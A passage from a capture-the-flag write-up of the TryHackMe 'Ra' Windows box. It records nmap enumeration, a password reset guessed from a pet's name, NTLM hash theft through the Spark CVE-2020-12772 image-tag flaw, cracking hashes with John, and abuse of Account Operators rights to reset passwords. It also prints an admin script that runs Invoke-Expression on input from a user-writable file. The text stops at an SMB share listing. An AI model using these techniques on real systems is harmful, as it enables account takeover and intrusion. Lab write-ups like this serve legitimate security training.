TryHackMe Ra Writeup

Welcome back to another TryHackMe Windows box writeup. Today box is called RA created by 4ndr34zz.

Machine Name: Ra
Difficulty: Hard
Created By: 4ndr34zz

Released On: 03rd July 2020
Machine Link: https://tryhackme.com/room/ra

This Windows box all about exploiting the wrongly configured web server and gaining access to SMB and then eventually gaining access to the WindCorp corporate’s internal network and escalating our privilege to own the Administrator account. There are 3 flags to be captured, so let us get in to the business.

TryHackMe Ra Writeup

Enumeration

As always, once the machine is booted and the IP addresses is allocated to me, I update my hots file with the IP of the machine as ra.thm and then started off with nmap scanning.

root@nav1n:~/thm/ra # nmap -sS -T4 -A -v ra.thm 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-31 14:25 +03
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:25
Completed NSE at 14:25, 0.00s elapsed
Initiating NSE at 14:25
Completed NSE at 14:25, 0.00s elapsed
Initiating NSE at 14:25
Completed NSE at 14:25, 0.00s elapsed
Initiating Ping Scan at 14:25
Scanning ra.thm (10.10.204.174) [4 ports]
Completed Ping Scan at 14:25, 0.17s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:25
Scanning ra.thm (10.10.204.174) [1000 ports]
Discovered open port 80/tcp on 10.10.204.174
Discovered open port 3389/tcp on 10.10.204.174
Discovered open port 139/tcp on 10.10.204.174
Discovered open port 443/tcp on 10.10.204.174
Discovered open port 135/tcp on 10.10.204.174
Discovered open port 445/tcp on 10.10.204.174
Discovered open port 53/tcp on 10.10.204.174
Discovered open port 7070/tcp on 10.10.204.174
Discovered open port 464/tcp on 10.10.204.174
Discovered open port 5222/tcp on 10.10.204.174
Discovered open port 3269/tcp on 10.10.204.174
Discovered open port 9090/tcp on 10.10.204.174
Discovered open port 3268/tcp on 10.10.204.174
Discovered open port 9091/tcp on 10.10.204.174
Discovered open port 5269/tcp on 10.10.204.174
Discovered open port 636/tcp on 10.10.204.174
Discovered open port 7777/tcp on 10.10.204.174
Discovered open port 2179/tcp on 10.10.204.174
Discovered open port 593/tcp on 10.10.204.174
Discovered open port 7443/tcp on 10.10.204.174
Discovered open port 88/tcp on 10.10.204.174
Discovered open port 389/tcp on 10.10.204.174
Completed SYN Stealth Scan at 14:25, 6.19s elapsed (1000 total ports)
.....snip......
Completed NSE at 14:30, 133.80s elapsed
Initiating NSE at 14:30
Completed NSE at 14:30, 0.00s elapsed
Nmap scan report for ra.thm (10.10.204.174)
Host is up (0.14s latency).
Not shown: 978 filtered ports
PORT     STATE SERVICE             VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http                Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Windcorp.
88/tcp   open  kerberos-sec        Microsoft Windows Kerberos (server time: 2020-07-31 11:25:14Z)
135/tcp  open  msrpc               Microsoft Windows RPC
139/tcp  open  netbios-ssn         Microsoft Windows netbios-ssn
389/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
| http-methods: 
|_  Supported Methods: OPTIONS
| http-ntlm-info: 
|   Target_Name: WINDCORP
|   NetBIOS_Domain_Name: WINDCORP
|   NetBIOS_Computer_Name: FIRE
|   DNS_Domain_Name: windcorp.thm
|   DNS_Computer_Name: Fire.windcorp.thm
|   DNS_Tree_Name: windcorp.thm
|_  Product_Version: 10.0.17763
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: commonName=Windows Admin Center
| Subject Alternative Name: DNS:WIN-2FAA40QQ70B
| Issuer: commonName=Windows Admin Center
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha512WithRSAEncryption
| Not valid before: 2020-04-30T14:41:03
| Not valid after:  2020-06-30T14:41:02
| MD5:   31ef ecc2 3c93 81b1 67cf 3015 a99f 1726
|_SHA-1: ef2b ac66 5e99 dae7 1182 73a1 93e8 a0b7 c772 f49c
|_ssl-date: 2020-07-31T11:28:20+00:00; 0s from scanner time.
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2179/tcp open  vmrdp?
3268/tcp open  ldap                Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server       Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: WINDCORP
|   NetBIOS_Domain_Name: WINDCORP
|   NetBIOS_Computer_Name: FIRE
|   DNS_Domain_Name: windcorp.thm
|   DNS_Computer_Name: Fire.windcorp.thm
|   DNS_Tree_Name: windcorp.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2020-07-31T11:27:41+00:00
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Issuer: commonName=Fire.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-04-30T06:40:02
| Not valid after:  2020-10-30T06:40:02
| MD5:   f21f 5e9b a220 8222 4c2b 8d71 ba6a c71f
|_SHA-1: 22ba c300 f70a 30a4 da1e ebcd 299b f94a aca4 c52c
|_ssl-date: 2020-07-31T11:28:20+00:00; 0s from scanner time.
5222/tcp open  jabber
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     capabilities: 
| 
|     xmpp: 
|       version: 1.0
|     unknown: 
| 
|     features: 
| 
|     auth_mechanisms: 
| 
|     errors: 
|       invalid-namespace
|       (timeout)
|     compression_methods: 
| 
|_    stream_id: 1ofp5ejn9v
5269/tcp open  xmpp                Wildfire XMPP Client
| xmpp-info: 
|   Respects server name
|   STARTTLS Failed
|   info: 
|     capabilities: 
| 
|     xmpp: 
|       version: 1.0
|     unknown: 
| 
|     features: 
| 
|     auth_mechanisms: 
| 
|     errors: 
|       host-unknown
|       (timeout)
|     compression_methods: 
| 
|_    stream_id: 9tznirp0tg
7070/tcp open  http                Jetty 9.4.18.v20190429
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
7443/tcp open  ssl/http            Jetty 9.4.18.v20190429
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Issuer: commonName=fire.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-01T08:39:00
| Not valid after:  2025-04-30T08:39:00
| MD5:   b715 5425 83f3 a20f 75c8 ca2d 3353 cbb7
|_SHA-1: 97f7 0772 a26b e324 7ed5 bbcb 5f35 7d74 7982 66ae
7777/tcp open  socks5              (No authentication; connection failed)
| socks-auth-info: 
|_  No authentication
9090/tcp open  zeus-admin?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Fri, 31 Jul 2020 11:25:14 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Fri, 31 Jul 2020 11:25:21 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   JavaRMI, drda, ibm-db2-das, informix: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   SqueezeCenter_CLI: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   WMSRequest: 
|     HTTP/1.1 400 Illegal character CNTL=0x1
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open  ssl/xmltec-xmlmail?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Fri, 31 Jul 2020 11:25:34 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Fri, 31 Jul 2020 11:25:34 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 400 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Issuer: commonName=fire.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-01T08:39:00
| Not valid after:  2025-04-30T08:39:00
| MD5:   b715 5425 83f3 a20f 75c8 ca2d 3353 cbb7
|_SHA-1: 97f7 0772 a26b e324 7ed5 bbcb 5f35 7d74 7982 66ae
4 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-TCP:V=7.80%I=7%D=7/31%Time=5F23FF9F%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5222-TCP:V=7.80%I=7%D=7/31%Time=5F23FFAE%P=x86_64-pc-linux-gnu%r(RP
SF:CCheck,9B,"<stream:error\x20xmlns:stream=\"http://etherx\.jabber\.org/s
SF:treams\"><not-well-formed\x20xmlns=\"urn:ietf:params:xml:ns:xmpp-stream
SF:s\"/></stream:error></stream:stream>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port9090-TCP:V=7.80%I=7%D=7/31%Time=5F23FF9A%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,11D,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Fri,\x2031\x20Jul\x202
SF:020\x2011:25:14\x20GMT\r\nLast-Modified:\x20Fri,\x2031\x20Jan\x202020\x
SF:2017:54:10\x20GMT\r\nContent-Type:\x20text/html\r\nAccept-Ranges:\x20by
SF:tes\r\nContent-Length:\x20115\r\n\r\n<html>\n<head><title></title>\n<me
SF:ta\x20http-equiv=\"refresh\"\x20content=\"0;URL=index\.jsp\">\n</head>\
SF:n<body>\n</body>\n</html>\n\n")%r(JavaRMI,C3,"HTTP/1\.1\x20400\x20Illeg
SF:al\x20character\x20CNTL=0x0\r\nContent-Type:\x20text/html;charset=iso-8
SF:859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r\n\r\n<h1>Bad\x
SF:20Message\x20400</h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x0</
SF:pre>")%r(WMSRequest,C3,"HTTP/1\.1\x20400\x20Illegal\x20character\x20CNT
SF:L=0x1\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nContent-Lengt
SF:h:\x2069\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><
SF:pre>reason:\x20Illegal\x20character\x20CNTL=0x1</pre>")%r(ibm-db2-das,C
SF:3,"HTTP/1\.1\x20400\x20Illegal\x20character\x20CNTL=0x0\r\nContent-Type
SF::\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnectio
SF:n:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illega
SF:l\x20character\x20CNTL=0x0</pre>")%r(SqueezeCenter_CLI,9B,"HTTP/1\.1\x2
SF:0400\x20No\x20URI\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nC
SF:ontent-Length:\x2049\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\
SF:x20400</h1><pre>reason:\x20No\x20URI</pre>")%r(informix,C3,"HTTP/1\.1\x
SF:20400\x20Illegal\x20character\x20CNTL=0x0\r\nContent-Type:\x20text/html
SF:;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r\
SF:n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20character
SF:\x20CNTL=0x0</pre>")%r(drda,C3,"HTTP/1\.1\x20400\x20Illegal\x20characte
SF:r\x20CNTL=0x0\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nConte
SF:nt-Length:\x2069\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x204
SF:00</h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x0</pre>")%r(HTTPO
SF:ptions,56,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Fri,\x2031\x20Jul\x202020
SF:\x2011:25:21\x20GMT\r\nAllow:\x20GET,HEAD,POST,OPTIONS\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port9091-TCP:V=7.80%T=SSL%I=7%D=7/31%Time=5F23FFAE%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,11D,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Fri,\x2031\x20Ju
SF:l\x202020\x2011:25:34\x20GMT\r\nLast-Modified:\x20Fri,\x2031\x20Jan\x20
SF:2020\x2017:54:10\x20GMT\r\nContent-Type:\x20text/html\r\nAccept-Ranges:
SF:\x20bytes\r\nContent-Length:\x20115\r\n\r\n<html>\n<head><title></title
SF:>\n<meta\x20http-equiv=\"refresh\"\x20content=\"0;URL=index\.jsp\">\n</
SF:head>\n<body>\n</body>\n</html>\n\n")%r(HTTPOptions,56,"HTTP/1\.1\x2020
SF:0\x20OK\r\nDate:\x20Fri,\x2031\x20Jul\x202020\x2011:25:34\x20GMT\r\nAll
SF:ow:\x20GET,HEAD,POST,OPTIONS\r\n\r\n")%r(RTSPRequest,AD,"HTTP/1\.1\x204
SF:00\x20Unknown\x20Version\r\nContent-Type:\x20text/html;charset=iso-8859
SF:-1\r\nContent-Length:\x2058\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20M
SF:essage\x20400</h1><pre>reason:\x20Unknown\x20Version</pre>")%r(RPCCheck
SF:,C7,"HTTP/1\.1\x20400\x20Illegal\x20character\x20OTEXT=0x80\r\nContent-
SF:Type:\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2071\r\nConne
SF:ction:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Il
SF:legal\x20character\x20OTEXT=0x80</pre>")%r(DNSVersionBindReqTCP,C3,"HTT
SF:P/1\.1\x20400\x20Illegal\x20character\x20CNTL=0x0\r\nContent-Type:\x20t
SF:ext/html;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20
SF:close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20c
SF:haracter\x20CNTL=0x0</pre>")%r(DNSStatusRequestTCP,C3,"HTTP/1\.1\x20400
SF:\x20Illegal\x20character\x20CNTL=0x0\r\nContent-Type:\x20text/html;char
SF:set=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r\n\r\n
SF:<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20character\x20C
SF:NTL=0x0</pre>")%r(Help,9B,"HTTP/1\.1\x20400\x20No\x20URI\r\nContent-Typ
SF:e:\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2049\r\nConnecti
SF:on:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20No\x2
SF:0URI</pre>")%r(SSLSessionReq,C5,"HTTP/1\.1\x20400\x20Illegal\x20charact
SF:er\x20CNTL=0x16\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nCon
SF:tent-Length:\x2070\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x2
SF:0400</h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x16</pre>");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: FIRE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-07-31T11:27:43
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   143.91 ms 10.11.0.1
2   143.96 ms ra.thm (10.10.204.174)

NSE: Script Post-scanning.
Initiating NSE at 14:30
Completed NSE at 14:30, 0.00s elapsed
Initiating NSE at 14:30
Completed NSE at 14:30, 0.00s elapsed
Initiating NSE at 14:30
Completed NSE at 14:30, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 334.05 seconds
           Raw packets sent: 2067 (94.632KB) | Rcvd: 54 (2.952KB)

The nmap scan reveals many ports are open, from an initial check I noticed the ADDC names, DNS address, LDAP services etc are running. I add the newly found DNS and ADDC information to my hosts file.

Target_Name: WINDCORP
NetBIOS_Domain_Name: WINDCORP
NetBIOS_Computer_Name: FIRE
DNS_Domain_Name: windcorp.thm
DNS_Computer_Name: Fire.windcorp.thm
DNS_Tree_Name: windcorp.thm
Product_Version: 10.0.17763

Webserver

The port 80 hosts a Microsoft IIS httpd 10.0 webserver. Upon visiting the port 80 (re.thm) the company portal opens up.

The website has a link to reset the password, more interestingly list of IT Support staff and their email IDs. I’m pretty sure this has to do something with foothold, so I made a list of username and their email id in tot a file called users.txt, emails.txt. There is a link to an IM service called “Spark“, this could as be a hint for something to gain foothold.

Resetting The User’s Password

As noticed initially, there is a link to reset the password of internal users, however we need to solve a couple of security questions in order to reset the password.

Going through the page, I noticed a section where the company highlighted 3 employees, listed a staff “Lili Levesque” with a pet. Her tagline says, “I love being able to bring my best friend to work with me!”. I recalled a password reset as well has a security question “What is/was your favorite pets name?”.

A quick look at Lily’s image showed me the image name “lilyleAndSparky.jpg” that means, the pet in Lily’s hand is “Sparky”. Let us try our luck here to reset Lily’s password.

I tried with the name as per the image name and successfully changes Lily’s password.

Awesome, I now have the working credential for one of the staffs, so I could eventually get in to the company’s network. However, Lily’s not an IT staff, so she should be having fewer privileges on the network. Looking at the services returned from namp scan I noticed SMB is running.

So next step, I tried to run SMBMAP against the credentials I have and following shares listed but all of them with read-only access to Lily.

Reading the files on the different directories, I found the file “Flag1.txt” in Shared folder, I used the SMBClient to download it.

Flag #1

Going through the other files in Lily’s directory I noticed several installers of “Spark” for different OS, The version of the installer is 2.8.3, so a quick search for “Spark 2.8.3” exploit led me to a recent vulnerability. The vulnerability is listed as “CVE-2020-12772“.

Spark 2.8.3 CVE-2020-12772 Vulnerability

A chat on the IM can include an IMG element with an SRC attribute referencing an external host’s IP address. Upon access to this external host, the (NT)LM hashes of the user are sent with the HTTP request. This allows an attacker to collect these hashes, crack them, and potentially compromise the computer. (ROAR can be configured for automatic access. Also, access can occur if the user clicks.)

As per the exploit I need to install the vulnerable version of the Spark locally, so I download the deb installer and installed it in my Kali box. After installation, I run the Spark, with the credentials of Liliye, but I was getting “certificate error”

But I found the way to bypass the certificate checking from the advanced menu and successfully logged-in as Lilyle.

After spending some time I found a GitHub repo where the RA machine makers put up an article that actually shows how to run the exploit from the image placeholder.

After a trial and error of few tries I finally got the NTLM hash of the user Buse (an IT Support User).

I copied the hash to a text file and used John to crack it.

Getting The System Access

As soon as I have the valid credentials of user Buse, I used Evil-WINRM to login to the system and get PS shell.

Flag #2

Checking the user Buse’s privilege, I found the user Buse is the member of “BUILTIN\Account Operators” it means the user Buse has the rights to reset passwords on standard user accounts.

IT Group members

*Evil-WinRM* PS C:\Users\buse\Documents> Get-AdGroupMember -identity “IT” | select name

name             
----             
Ruby Woods       
Shelly Webb      
Edward Lewis     
Yolanda Fernandez
Carla Meyer      
Edeltraut Daub   
Britney Palmer   
Buse Candan      
Hemmo Boschma    
Emile Lavoie     
Léia Araújo      
Luis Lowe        
آریا احمدی       
Jaqueline Dittmer
بردیا کریمی      
Toivo Kuusisto   
Emilie Henry     
Mary George      
Jackson Vasquez  
Emily Anderson   
Wilmer Røren     
Antonietta Vidal 
Isra Saur        
Isabella Hughes  

Privilege Escalation

Going further, I found a couple of directories and a text file, but none of them seemed useful. Enumerating the system, I found a directory in C:/scripts/ with a PowerShell script called “checkservers.ps1“, I tried to run the script but got “access denied”

The CheckServers.ps1 Script

The script:

# reset the lists of hosts prior to looping 
$OutageHosts = $Null 
# specify the time you want email notifications resent for hosts that are down 
$EmailTimeOut = 30 
# specify the time you want to cycle through your host lists. 
$SleepTimeOut = 45 
# specify the maximum hosts that can be down before the script is aborted 
$MaxOutageCount = 10 
# specify who gets notified 
$notificationto = "brittanycr@windcorp.thm" 
# specify where the notifications come from 
$notificationfrom = "admin@windcorp.thm" 
# specify the SMTP server 
$smtpserver = "relay.windcorp.thm" 
 
# start looping here 
Do{ 
$available = $Null 
$notavailable = $Null 
Write-Host (Get-Date) 
 
# Read the File with the Hosts every cycle, this way to can add/remove hosts 
# from the list without touching the script/scheduled task,  
# also hash/comment (#) out any hosts that are going for maintenance or are down. 
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |   
ForEach-Object { 
    $p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
    Invoke-Expression $p 
if($p) 
    { 
     # if the Host is available then just write it to the screen 
     write-host "Available host ---> "$_ -BackgroundColor Green -ForegroundColor White 
     [Array]$available += $_ 
    } 
else 
    { 
     # If the host is unavailable, give a warning to screen 
     write-host "Unavailable host ------------> "$_ -BackgroundColor Magenta -ForegroundColor White 
     $p = Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue 
     if(!($p)) 
       { 
        # If the host is still unavailable for 4 full pings, write error and send email 
        write-host "Unavailable host ------------> "$_ -BackgroundColor Red -ForegroundColor White 
        [Array]$notavailable += $_ 
 
        if ($OutageHosts -ne $Null) 
            { 
                if (!$OutageHosts.ContainsKey($_)) 
                { 
                 # First time down add to the list and send email 
                 Write-Host "$_ Is not in the OutageHosts list, first time down" 
                 $OutageHosts.Add($_,(get-date)) 
                 $Now = Get-date 
                 $Body = "$_ has not responded for 5 pings at $Now" 
                 Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom ` 
                  -Subject "Host $_ is down" -SmtpServer $smtpserver 
                } 
                else 
                { 
                    # If the host is in the list do nothing for 1 hour and then remove from the list. 
                    Write-Host "$_ Is in the OutageHosts list" 
                    if (((Get-Date) - $OutageHosts.Item($_)).TotalMinutes -gt $EmailTimeOut) 
                    {$OutageHosts.Remove($_)} 
                } 
            } 
        else 
            { 
                # First time down create the list and send email 
                Write-Host "Adding $_ to OutageHosts." 
                $OutageHosts = @{$_=(get-date)} 
                $Body = "$_ has not responded for 5 pings at $Now"  
                Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom ` 
                 -Subject "Host $_ is down" -SmtpServer $smtpserver 
            }  
       } 
    } 
} 
# Report to screen the details 
$log = "Last run: $(Get-Date)"
write-host $log
Set-Content -Path C:\scripts\log.txt -Value $log
Write-Host "Available count:"$available.count 
Write-Host "Not available count:"$notavailable.count 
Write-Host "Not available hosts:" 
$OutageHosts 
Write-Host "" 
Write-Host "Sleeping $SleepTimeOut seconds" 
sleep $SleepTimeOut 
if ($OutageHosts.Count -gt $MaxOutageCount) 
{ 
    # If there are more than a certain number of host down in an hour abort the script. 
    $Exit = $True 
    $body = $OutageHosts | Out-String 
    Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom ` 
     -Subject "More than $MaxOutageCount Hosts down, monitoring aborted" -SmtpServer $smtpServer 
} 
} 
while ($Exit -ne $True) 

I download the script to my local machine for further. The script is run by the user Brittanycr, who is as well a member of IT group, but she is not a member of Administrator group. So I can change the password and get the 3rd flag from her desktop.

*Evil-WinRM* PS C:\Users\buse\Documents> net user brittanycr
User name                    brittanycr
Full Name                    Brittany Cruz
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/3/2020 7:15:48 AM
Password expires             6/14/2020 7:15:48 AM
Password changeable          5/4/2020 7:15:48 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   5/3/2020 6:27:42 AM

Logon hours allowed          All

Local Group Memberships      
Global Group memberships     *Domain Users         
The command completed successfully.

*Evil-WinRM* PS C:\Users\buse\Documents> 

And I changed the password successfully.

After changing the password, I tried to log in as Brittany, but failed. It means, there is still more to go, Brittany is not the user or Evil-WINRM is not the right way to get 3rd flag.

After spending some time enumerating, I decided to look in tot the PowerShell script which I completely forgot about. Going line by line, I notice the line:

get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |   

The line says, there is a file on Brittany’s desktop which get executed with the script that check the hosts every cycle or every time the script run. I think I can run anything as an Administrator. Also, luckily I now have a new password for Brittany so that I could access to her directory and access the hosts file. Let us do it using smbclient.

root@nav1n:~/thm/ra # smbclient //windcorp.thm/Users/brittanycr/Desktop -U brittanycr
Enter WORKGROUP\brittanycr's password: 
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
root@nav1n:~/thm/ra # smbclient //windcorp.thm/Users -U brittanycr                                         1 ↵
Enter WORKGROUP\brittanycr's password: 
Try "help" to get a list of possible commands.
smb: \> sir
sir: command not found
smb: \> ls
  .                                  DR        0  Sun May  3 01:05:58 2020
  ..                                 DR        0  Sun May  3 01:05:58 2020
  Administrator                       D        0  Sun May 10 14:18:11 2020
  All Users                         DHS        0  Sat Sep 15 10:28:48 2018
  angrybird                           D        0  Fri May  1 15:59:20 2020
  berg                                D        0  Fri May  1 15:59:20 2020
  bluefrog579                         D        0  Fri May  1 15:59:20 2020
  brittanycr                          D        0  Sun May  3 02:36:46 2020
  brownostrich284                     D        0  Fri May  1 15:59:20 2020
  buse                                D        0  Fri Jul 31 17:05:04 2020
  Default                           DHR        0  Fri May  1 02:35:11 2020
  Default User                      DHS        0  Sat Sep 15 10:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 10:16:48 2018
  edward                              D        0  Fri May  1 15:59:20 2020
  freddy                              D        0  Sun May  3 02:30:16 2020
  garys                               D        0  Fri May  1 15:59:20 2020
  goldencat416                        D        0  Fri Jul 31 20:06:05 2020
  goldenwol                           D        0  Fri May  1 15:59:20 2020
  happ                                D        0  Fri May  1 15:59:20 2020
  happyme                             D        0  Fri May  1 15:59:20 2020
  Luis                                D        0  Fri May  1 15:59:20 2020
  orga                                D        0  Fri May  1 15:59:20 2020
  organicf                            D        0  Fri May  1 15:59:20 2020
  organicfish718                      D        0  Fri Jul 31 20:01:59 2020
  pete                                D        0  Fri May  1 15:59:20 2020
  Public                             DR        0  Thu Apr 30 17:35:47 2020
  purplecat                           D        0  Fri May  1 15:59:20 2020
  purplepanda                         D        0  Fri May  1 15:59:20 2020
  sadswan                             D        0  Fri May  1 15:59:20 2020
  sadswan869                          D        0  Fri Jul 31 20:05:23 2020
  sheela                              D        0  Fri May  1 15:59:20 2020
  silver                              D        0  Fri May  1 15:59:20 2020
  smallf                              D        0  Fri May  1 15:59:20 2020
  spiff                               D        0  Fri May  1 15:59:20 2020
